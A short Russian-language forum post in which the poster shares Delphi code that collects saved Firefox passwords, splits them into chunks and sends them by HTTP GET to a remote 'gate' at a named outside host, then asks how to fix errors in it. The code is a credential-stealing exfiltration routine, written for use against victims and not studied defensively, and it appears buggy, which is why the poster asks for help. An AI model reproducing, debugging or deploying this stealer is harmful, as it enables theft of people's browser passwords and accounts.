Отсылаю собственно пароли от firefox на gate. Вот код: Code: GetFFInfos; http:=tidhttp.Create(nil); setlength(t,Length(mozillapassword) div 200+1); for i:=0 to (Length(mozillapassword) div 200+1) do t[i]:=Copy(mozillapassword, i*200, 200); for i:=0 to (Length(mozillapassword) div 200) do ss:=ss+'txt'+inttostr(i)+'='+t[i]+'&'; http.get('http://webmoney1.jino-net.ru/index.php?'+ss); http.Free; И выводит мне тут вот такие страсти подскажите в чем причина и методы ее исправления